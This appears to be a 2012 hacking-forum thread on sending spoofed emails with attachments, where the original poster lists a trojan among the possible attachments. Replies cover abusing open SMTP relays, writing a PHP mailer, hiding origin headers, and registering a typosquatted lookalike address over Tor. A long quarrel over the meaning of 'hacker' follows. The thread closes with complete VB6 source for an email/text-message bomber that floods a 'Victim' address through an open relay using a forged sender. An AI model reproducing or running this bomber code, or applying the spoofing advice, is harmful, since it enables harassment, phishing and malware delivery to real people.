Spoofed Email With Attachment

[power]

There are lots of groovy free email spoofing services out there, but does anyone know of one (or some way) where you could attach something to the spoofed e-mail, like a love letter, poem, trojan, picture of your dog, etc?

[Jamo]

You can use open smtp server and sendmail (debian app) or copy/paste small ruby script. Or script with other language :)

[digip]

You could script your own PHP mailer and attachments using base-64 encoding for inline message attachments, but you would need a server to upload and run the PHP script from. Doing from your own domain, gives away that it was you, since email headers default to the server or host its run from. They can be spoofed if run from a VM running DNS locally as a services and then forwarded out over a proxy or VPN service, but any way you slice it, its pretty much nefarious black hat stuff, so you do what you want at your own risk. I don't have a problem discussing how to do those things legal or illegal, since knowledge is not a crime, but its on you if you go that route. Using other peoples servers and open mail relays is also illegal in some parts of the world and can be fined or arrested for fraud and computer abuse laws, depending on where you are from and if someone wanted to press charges. Spammers do go to jail sometimes, but you would have to be like famous ones who send a shit ton of spam world wide, like the spam king(s) http://en.wikipedia....Eddie_Davidson. (There have been numerous people fined and served jail time for this sort of stuff).

http://en.wikipedia.org/wiki/Spam_King

http://en.wikipedia.org/wiki/List_of_spammers

Edited August 21, 2012 by digip

[power]

Thanks for both replies. They are both going to be useful in the future I'm sure, although I was hoping for a simplier (under 5 minute) solution. I kind of found one.

What I ended up doing was instead of spoofing the email addy that was like "HTMNPaint@hotmail.com" I registered "HTNMPaint@hotmail.com" via a patched copy of Tor and went that route.

Thanks for the legal side notes, Digip. At the end of the day I agree with you that this is just talk and it's a hacking forum so hopefully most of the topics, like all your Jasager goodness, is going to be very black hat and potentially wildly illegal if any of us were actual hackers who used these tools instead of just the law abiding, government loving, celebate, big brother supporting developers who only post online and never really hack, like we all are.

[digip]

I don't own a Pineapple, nor do I see Jasagar as a strictly blackhat tool either(nor is it mine - That's Darren, DigiNinja, Mubix and many others who contributed to building that tool). It has a purpose, how you use it is up to you though. Same with the ability to spoof mail, such as replying to a potential threat or phishing scam, you would want to be able to hide your home IP and info from the email headers in the event it was sent to you only to get you to reply and then attack you. Most email clients, send back your IP from your home location, regardless of what tools you use to spoof with, which is why using a third party site and script, as well as VPN or layers like TOR comes in handy ;)

The internet isn't just a two way street. It has many sidewalks and alleys, overpasses and tunnels, and off beaten paths to get from point A to point %00.

Edited August 21, 2012 by digip

[power]

Right, exactly (except I did think you had a Pineapple, I was confusing you with digininja). These things almost all have legitimate uses, and as far as those that don't (what's the whitehat use of Karma again?) or in terms of why we want to understand how hackers hack, it's all just pure intellectual curiosity. I agree completely, although I expected that this would be taken as a given on hacking forum.

[digip]

The pineapple is basically Karma on the FON, or at least, thats what the original idea was. Its grown well beyond that with a number of other tools on the device. The point is, the tool itself is in itself just that. Pentesters and people hired to test and penetrate networks, law enforcement, government agencies, military, have practical uses for tools like this. So do criminals, and attackers.

Let it be known, I stand strongly by what I consider the difference between a hacker, and a criminal. People like Tesla, Ben Franklin, Steve Wozniak, they are what I consider true hackers. They invented, tinkered, experimented, and learned how to make things we all use today, but also how to manipulate them, better them, etc. Although hackers and criminals both may know how to do the same thing, and have similar skills, but in my eyes and in my heart, hackers build stuff, invent, and in general, make the world a better and safer place. They are the ones looking to save us from attacks by finding and exposing flaws in the system and are often the ones writing the patches or telling us how to fix them, and half the reasons tools like this are invented, to learn about weaknesses in protocols, or to say, make something better out of what was initially some mediocre thing, tinker, learn, experiment and improve or find its flaws.

The criminal and attacker, is the person who uses those skills for ill gotten gains, has no moral standard, could care less about who they hurt, and only cares about what they want out of it. They are the ones who could care less about the innocent involved, ie: Some who have tarnished the original meaning of what Anonymous stood for, which was to fight corruptions, they for the most part today are that corruption, and the ones who break into networks and then expose innocent users credit cards, personally identifiable information, doing it "for the lulz" or sell it to the highest bidder on the black market. I don't consider them true hackers, just because they have the same knowledge as the rest of the hackers out there. A man in a shopping mall with a gun is not a police officer, just because he knows how to shoot people with a gun. I only consider them criminals, and you have to take a stance at making he distinction between the two, because it doesn't matter if someone with a hunting license, can carry a gun and shoot with it, it matters if that person becomes a nut and decides to kill someone with it. Thats a metaphor, but I think illustrates where I stand on what I consider a hacker, and a criminal. Skill sets may be the same, but one uses their skill for good, the other, criminal activity. Not all hackers who've been arrested in my mind, are criminals. Its a media driven, FUD campaign, that labels far and wide that "hacker" in and of itself is synonymous with "criminal" and the public at large follows in that same fear mongering and perpetuates the wrong perception and true ideals of what I consider to be a hacker.

With regard to Karma and the Pineapple, using one in your own home, also has a use for protecting your network, or to identify people who might also be attacking your own, regular wireless access point. Again, its a tool. How and what you do with those tools defines who and what you are, but knowledge in and of it self, is not a crime, only your actions and what you do with that information is. Is the pineapple a fun toy for the novice hacker who might want to do some tom foolery, sure, but so long as you aren't using it to steal peoples data or break into networks you we're not given permission to be on, I have no problem with it. Its when you use it for illicit, unlawful purposes that break the law that you've crossed the line from being the curious hacker, to the person with a criminal intent and agenda to use it for their own personal gain that makes you a criminal, and no longer a hacker.

Edited August 22, 2012 by digip

[power]

i appreciate your reply...does every thread get such a long legal debate?

"People like Tesla, Ben Franklin, Steve Wozniak, they are what I consider true hackers."

How about Kevin Mitnick? People like Steve Wozniak, Snubs, and Darren consider him the iconic hacker and he was pure black. How about Captain Crunch, the Roscoe Gang and actual hackers, not historical figures who never heard the term? Mitnick has even been on hak5.

Why don't you see what your friend Steve Wozniak has to say about that bad criminal Kevin Mitnick in the forwards to Mitnick's books? He loves him. That's what a hacker is to Wozniak, to me, and to most normal non-delusional individuals. Wozniak even painted a hilarious hacker-behind-bars picture for Mitnick... but you say Mitnick was *NOT* a hacker *because* he illegally hacked companies? LOL come off your high horse, man...

"With regard to Karma and the Pineapple, using one in your own home, also has a use for protecting your network"

Uh... not really. You are familiar with what the Pineapple is? Have you seen Darren's eBook on how to eavesdrop, dump data, penetrate, etc? You realize that Karma lies to people who are not you to pretend to be their networks?

"Is the pineapple a fun toy [sic] for the novice hacker who might want to do some tom foolery, sure, but so long as you aren't using it to steal peoples data or break into networks you we're not given permission to be on, I have no problem with it. Its when you use it for illicit, unlawful purposes that break the law that you've crossed the line from being the curious hacker, to the person with a criminal intent and agenda to use it for their own personal gain that makes you a criminal, and no longer a hacker."

I say this with no ill-intent and I'm sure you're a great guy :) , but I think you're just being delusional and holier-than-thou [in this thread] to the point that it's ridiculous. I have no idea how I got so lucky as to inspire this legal/ethical debate, I just wanted to know how to spoof an e-mail with an attachment; it seems pretty straight-forward and no different morally, ethically, or legally than any of the other hacking techniques being discussed. Frankly, I think maybe a bug crawled up your leg and you decided to take it out on me. I won't hold it against you.

Given your last statement that if someone hacks into a network/something without authorization they're not hackers (pretending that it's not obvious that such "criminals" are the inspiration for this website, forum, and hacking culture in general) let's now look at the Merriam-Webster dictionary definition of the word hacker:

": a person who illegally gains access to and sometimes tampers with information in a computer system "

OK, now the Oxford English Dictionary:

"Definition of hacker

noun

person who uses computers to gain unauthorized access to data."

As I said what feels like about a dozen times in earlier posts, I myself would never hack, but if I ask a question about how to hack in a hacking forum I don't see why you come at me with tons of legal warnings, arguments, and moral attacks on hackers, who you say aren't hackers if they illegally hack. Jeeze... I also wonder why you don't bring your legal zeal to every other thread instead of just mine.

Edited August 24, 2012 by power

[digip]

Woah, woah woah...I was responding to your post first off and offering up my perspectives. Didn't know it was a crime to have an opinion or to be a critical thinker. (I also tend to make lengthy posts. Thats just who I am.)

Sorry you don't like answers that don't give you only what you want, but thats now how communication works. Much of what people say no one wants to hear, but I am not here to preach to the choir or change who you are, or try to attack you.

People like Steve Wozniak, Snubs, and Darren consider him the iconic hacker and he was pure black.

Do you know Kevin personally? You seem to be such as "expert" on him, as if all the man has ever done was to hurt or destroy places he hacked into. Did he break the law? Absolutely. He also served time in solitary for years because someone told the judge he could whistle nuclear launch codes into a phone to start WWIII. Come off my high horse? Really? lol

I'm not on my "high horse", and Kevin, while he did break some laws and spent many years in solitary for what amounted to a few thousand dollars in fines when all was said and done, he was by and large made an example of in the media and Hollywood as the "world's most wanted hacker" for things that are largely myth and much more importantly, far from ill intent with respect to what we see today with attacks on networks. Kevin is a genuinely nice person, and far from a hardened criminal nor do I think hes of the same ilks as those selling credit cards and working the blakchat scene only to do harm for their own gain. I've also met him, (and several times was going to be creating new websites for him, which just didn't work out to schedules and other personal issues none of anyones business, but anyway) and while I don't known him on some deeply personal level about everything hes been through in his life, Kevin is one of the people EVERYONE uses as an example of the term "hacker == criminal". While he is skilled at hacking, he is also one of the world's foremost experts on Social Engineering, which is largely what made up most of his skills that he still uses today. He's paid his dues, served his time in jail, and now works lawfully to help protect people's networks, because he knows how to break into them, and also knows how to help people protect them.

You realize that Karma lies to people who are not you to pretend to be their networks?

Yup. Just like the pineapple can do. So what's your point there? Does Back|Track NOT have a lot of tools to do illegal, illicit things? Its a tool. A hammer is a tool. Until I hit someone over the head with it, its still just a tool. Writing books or manuals on how to hack, how to use the Pineapple, thats called knowledge, and also free speech. I could write books on how to build bombs, and while it would have a hard time being printed and sold (ie: anarchists cookbook) its not illegal to know how to do things or even do them, its how and what you do with them that determines where the lines are crossed.

I have no idea how I got so lucky as to inspire this legal/ethical debate

Sorry you feel some personal attack on yourself by my responses. I get that a lot. People might just need to step back and re-read the threads, but I didn't know it was some kind of attack on you, or a debate, or that people didn't have a right to reply their thoughts on a subject and where they stand, for them self. You do what you want on your own, I could care less and was only making points, not attacking you or trying to "preach" the gospel. You obviously took this as some sort of attack on yourself, or you wouldn't have gotten your panties in a bunch over the entire thing. I can troll people, and I do it a lot, but seriously, this was not one thread where I was trying to or intended to offend of troll someone. You did that to yourself.

let's now look at the Merriam-Webster dictionary definition of the word hacker:

": a person who illegally gains access to and sometimes tampers with information in a computer system "

OK, now the Oxford English Dictionary:

"Definition of hacker

noun

person who uses computers to gain unauthorized access to data."

Now THERE is a topic for true debate, and we've got PLENTY of people on the forums with opinions on this, and many threads discussing it already. Feel free to search and reply to those as well. I welcome a good talk about the topic.

This is by and large a matter of opinion though, and mainstream media, including the "Merriam-Webster dictionary" and "Oxford English Dictionary" can print whatever the hell they want. Just like Hollywood has romanticized the whole hacker term making kids everywhere want to be l337 haxors thinking its like it is in the movies when in reality its some frustrated coder or hardware tinkerer trying to work on the same thing for weeks on end to make it do what they want.

Media and news outlets like Fox and New York times turn it into every "hacker" is a criminal by default. They are not. Hackers are people too, people who test, design, invent, and make this world a better place. We have a difference of opinions on what the term hacker means to each of us, but you sir can take it however you like. I've stated before on the forums, and many know this, I could care less what people think of me, their opinions of me, and as such, I only call it how I see it from my perspective and what it means to me.

There is no legal debate here though, nor some attack on you and whatever the hell you want to do with whatever it is you want to do, nor did I attack you in any way shape or form. You planted that seed in your own head. It would seem you feel that way though from your reply. I sense a bit of hostility, sarcasm, and shear wtf'ism but I can't change how YOU feel, but I will be damned if I'm going to be told how I'm supposed to look at the term "Hacker" and somehow care what someone else's opinion of it is. Many of us have strong opinions on what a hacker is, there are numerous threads on this forum about the same thing, some who support my view, some who don't and for the most part many who've given up on even trying to get the word out about what they feel a hacker is.

I also wonder why you don't bring your legal zeal to every other thread instead of just mine.

I'm not a lawyer, but if you've been on the forums and read EVERYTHING I've ever written(check my post count and when I registered, I've been here a while, I get this a lot from people all the time), I get into the same kinds of dialogs with people all the time accusing me of attacking them or taking some sort of "legal" stance. I truly could give a flying fuck what you do with whatever you learn on these or any other forums, sites, books, etc. No love lost here, don't take it personally, but you can be angry at me if you want, has nothing to do with me, but whatever, up to you on how YOU see it.

I enjoy a good dialog on various topics I have my own opinions about. Its a forum, where people are going to say things that make you uncomfortable. Apparently I have. I make no apologies for anything I said though, because I don't feel I've attacked you in any way shape or form. I've not accused you of anything in this thread topic, I've not attacked you on anything in this topic, and I'm entitled to make my posts and replies as long as I feel they need to be. TLDR, I don't really care.

Sometimes when people write stuff in replies, its not all about you, but maybe just different key things touched upon in the thread. Taking it as personal attack, is something you did yourself, but thats on you and your perspective, I can't change how you feel. Only thing I can say is, hope you wake up feeling better tomorrow knowing that sometimes things people say, are not all about YOU, nor is everyone out to get you or put you down in a thread. These are just statements or general opinions. If I was attacking you, I'd come right out and tell you or chew you out personally.

Seriously, have a nice day, move on. Not worth working yourself up over.

By the way, this is the Internet. Get used to it.

=) Cheers.. [_])

Edited August 24, 2012 by digip

[bobbyb1980]

The "evil hackers" are the ones like Assange, these entitled kids with this new age whistle blower mentality who think they're one of a kind. These kids endanger the lives of the people who protect their upper middle class existences, and not for money, but just to laugh as it happens.

Back to the topic... sending spoofed emails w/attachments isn't that difficult if you know a scripting language. Google 'perl smtp tutorial' or 'c++ smtp tutorial' or whatever language you use and you'll find tons of code that you can easily and quickly edit to your liking.

[Mr-Protocol]

Here are some things to read on in regards to the OP.

http://www.ietf.org/rfc/rfc0821.txt

http://www.gentle.it/alvise/smtp.htm

Here was the code I used with an Open Relay mail server back in the day for an email/text message bomber.

This was done in VB6 a LOOOONG time ago. This does not address your attaching of a file though.

Option Explicit
Dim CaseNum As Integer
Dim Victim As String
Dim Message As String
Dim VarEmail As String
Dim SentSMTP As Integer
Dim SMTPLimit As Integer
Dim Running As Boolean
'-----------------------------------------------------------------------------------
Private Sub Cmd_Start_Click()
DoEvents
Victim = txtVic.Text
Message = txtMsg.Text
SMTPLimit = txtLimit.Text
VarEmail = txtFrom.Text
cmd_Start.Enabled = False
cmd_Stop.Enabled = True
Running = True
txtFrom.Enabled = False
txtVic.Enabled = False
txtMsg.Enabled = False
txtLimit.Enabled = False
txtLog.Text = ""
WS.Close
WS.Connect
End Sub
'-----------------------------------------------------------------------------------
Private Sub cmd_Stop_Click()
WS.Close
Running = False
cmd_Start.Enabled = True
cmd_Stop.Enabled = False
txtFrom.Enabled = True
txtVic.Enabled = True
txtMsg.Enabled = True
txtLimit.Enabled = True
CaseNum = 1
txtFrom.SetFocus
End Sub
'-----------------------------------------------------------------------------------
Private Sub CmdInfo_Click()
Form1.Hide
Form2.Show
End Sub
'-----------------------------------------------------------------------------------
Private Sub cmdReset_Click()
SentSMTP = 0
txtFrom.Text = "_Pwn@ownage.com"
txtVic.Text = "Victim@domain.com"
txtMsg.Text = "Fuck You!"
txtLog.Text = "Data Log"
lblSent.Caption = "0"
txtLimit.Text = "200"
End Sub
'-----------------------------------------------------------------------------------
Private Sub Form_Load()
Running = True
CaseNum = 1
End Sub
'-----------------------------------------------------------------------------------
Private Sub Form_Unload(Cancel As Integer)
End
End Sub
'-----------------------------------------------------------------------------------
Private Sub WS_DataArrival(ByVal bytesTotal As Long)
DoEvents
Dim RecvData As String
Dim Buffer As String
WS.GetData RecvData
Buffer = Buffer + RecvData

DoEvents
Do
Select Case CaseNum
Case 1
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "220") Then
CaseNum = 2
WS.SendData "MAIL FROM:<" & SentSMTP & VarEmail & ">" & vbCrLf
End If
Buffer = ""
Case 2
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "553") Then
MsgBox Buffer, vbOKOnly, "Domain Error!"
cmd_Stop_Click
Exit Sub
End If
DoEvents
If InStr(1, Buffer, "250") Then
CaseNum = 3
WS.SendData "RCPT TO:<" & Victim & ">" & vbCrLf
Buffer = ""
End If
Case 3
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "250") Then
CaseNum = 4
WS.SendData "DATA" & vbCrLf
Buffer = ""
End If
''''''''''''''''''''' Add TO:email@domain.com
''''''''''''''''''''' Add FROM:email@domain.com
''''''''''''''''''''' Add SUBJECT:test

Case 4
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "354 Ok Send data ending with <CRLF>.<CRLF>") Then
CaseNum = 5
WS.SendData Message & SentSMTP & vbCrLf
Buffer = ""
End If
Case 5
DoEvents
txtLog.Text = txtLog.Text + Buffer
CaseNum = 6
WS.SendData "." & vbCrLf
SentSMTP = SentSMTP + 1
lblSent.Caption = SentSMTP
Case 6
DoEvents
txtLog.Text = txtLog.Text + Buffer
If InStr(1, Buffer, "250") Then
CaseNum = 7
WS.SendData "QUIT" & vbCrLf
CaseNum = 7
End If
Buffer = ""
Case 7
DoEvents
CaseNum = 1
End Select
Loop Until CaseNum = 7
If SentSMTP >= SMTPLimit Then
cmd_Stop_Click
Exit Sub
End If
Cmd_Start_Click
End Sub
'-----------------------------------------------------------------------------------
Private Sub WS_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
CaseNum = 1
WS.Close
WS.Connect
End Sub
[/CODE]